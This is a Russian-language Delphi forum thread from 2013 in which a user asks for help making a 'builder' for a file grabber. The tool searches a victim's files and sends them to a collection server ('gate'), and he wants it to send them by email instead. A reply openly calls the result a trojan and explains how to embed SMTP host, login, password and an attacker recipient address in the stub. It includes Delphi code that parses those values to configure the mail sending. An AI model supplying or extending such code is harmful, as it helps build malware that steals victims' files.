Пятница, 22.11.2019, 13:03 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: xXxSh@dowxXx, Anton93, Волк-1024  
delfcode » Delphi » Вопросы по Delphi » Builder
Builder
BornДата: Суббота, 28.09.2013, 20:49 | Сообщение # 1
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Ребят вообщем такая проблема.Написал билдер поиска файлов с отправкой на гейт))а вот как не пробывал написать такой же билдер тока с отправкой намыло)ну никак не получается( помогите пожалуйста до пилить билдер с отправкой на мыло.
 
ramzeswrДата: Воскресенье, 29.09.2013, 08:38 | Сообщение # 2
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Ну выкладывай что у тебя там. В чем проблема-то?
 
BornДата: Воскресенье, 29.09.2013, 13:27 | Сообщение # 3
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Сюда выкладывать не буду по понятным причинам.
 
NeoДата: Воскресенье, 29.09.2013, 15:43 | Сообщение # 4
Модератор
Зарегистрирован: 04.05.2010
Группа: Модераторы
Сообщений: 317
Статус: Offline
Цитата (Born)
Сюда выкладывать не буду по понятным причинам.

ООО smile
Цитата (Born)
Написал билдер поиска файлов с отправкой на гейт))

А,ну да,причина понятна! Это ж мегаприват!!
 
BornДата: Воскресенье, 29.09.2013, 16:53 | Сообщение # 5
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Это не мегаприват)просто в инете нет нормальных примеров билдеров!темболе с отправкой на гейт,а про мыло я воще молчу.А если ты смеёшь:Над мегапривато,то будь добр выложи пример с отправкой на мыло.
 
ramzeswrДата: Воскресенье, 29.09.2013, 17:07 | Сообщение # 6
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата (Born)
на гейт,а про мыло я воще молчу
А какая разница то? В количестве заменяющихся строк?
 
BornДата: Воскресенье, 29.09.2013, 17:14 | Сообщение # 7
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Я не меняю строки)в билдере использую всего 3 функций + ресторар)

Сообщение отредактировал Born - Воскресенье, 29.09.2013, 17:44
 
ramzeswrДата: Воскресенье, 29.09.2013, 18:22 | Сообщение # 8
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Как это ты не меняешь строки? А ссылка на гейт?
 
BornДата: Воскресенье, 29.09.2013, 18:47 | Сообщение # 9
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Хех..а ссылка на гейт, это уже другой вопрос)но не замена строк)))
 
ramzeswrДата: Понедельник, 30.09.2013, 15:52 | Сообщение # 10
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата (Born)
Хех..а ссылка на гейт, это уже другой вопрос)но не замена строк)))

Ну освети вопрос, что в этом такого то?
 
BornДата: Понедельник, 30.09.2013, 19:35 | Сообщение # 11
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Цитата (ramzeswr)
Ну освети вопрос, что в этом такого то?

Я не собираюсь давать свой исходник в паблик)просто спросил кто поможет? А ты пытаешься с помощью СИ вытащить из меня код.


Сообщение отредактировал Born - Понедельник, 30.09.2013, 19:36
 
ramzeswrДата: Понедельник, 30.09.2013, 21:08 | Сообщение # 12
Участник
Зарегистрирован: 17.04.2013
Группа: Пользователи
Сообщений: 61
Статус: Offline
Цитата (Born)
Я не собираюсь давать свой исходник в паблик)просто спросил кто поможет? А ты пытаешься с помощью СИ вытащить из меня код.

Ой, да сдался мне твой код. Как мы тебе поможем, если ты ничего не говоришь? Да и я не вижу разницы между отправкой на гейт и на мыло, касаемо билдера
Ну допустим умеешь ты делать билдер фаилграббера на гейт. По идее билдер в уже готовый "троян" должен вхерачить ссылку(уж незнаю я твой супер способ вхерачивания).
Получается в стаб идет одна строковая переменная. Если у тебя возникли трудности с вхерачиванием билдером в стаб более одной строки, то можешь поступить так: Передаешь одну строку такого вида: <host>mail.ru</host><login>olololo@mail.ru</mail><pass>qwerty147</pass><recipient>hacker@mail.ru</recipient>

Далее твой троян должен выдернуть из этой строки данные для подключения и мыло получателя письма.
Тут используй процедуру Pars
Код
function TForm1.Pars(T_, ForS, _T: string): string;
var a, b:integer;
begin
Result := '';
if (T_='') or (ForS='') or (_T='') then Exit;
a:=Pos(T_, ForS);
if a=0 then Exit else a:=a+Length(T_);
ForS:=Copy(ForS, a, Length(ForS)-a+1);
b:=Pos(_T, ForS);
if b>0 then
Result:=Copy(ForS, 1, b - 1);
end;


Использовать вот так: pars('начало',откуда,'конец'), то есть
Код
SMTP.Host:=pars('<host>',s,'</host>');
SMTP.Username:=pars('<login>',s,'</login>');
SMTP.Password:=pars('<pass>',s,'<pass>');
IdMessage1.Recipients.EMailAddresses:= pars('<recipient>',s,'</recipient>');


Где s - это то что ты вхерачил в свой трой(то что я выделил красным)
Надеюсь разрулили) Если написал чушь, то скажи, я не обижусь)


Сообщение отредактировал ramzeswr - Понедельник, 30.09.2013, 21:09
 
BornДата: Понедельник, 30.09.2013, 22:33 | Сообщение # 13
Частый гость
Зарегистрирован: 01.10.2012
Группа: Пользователи
Сообщений: 49
Статус: Offline
Да нет не чушь))большое спасибо!но у меня по другому код билдера))
 
delfcode » Delphi » Вопросы по Delphi » Builder
  • Страница 1 из 1
  • 1
Поиск:

delfcode.ru © 2008 - 2019 Хостинг от uCoz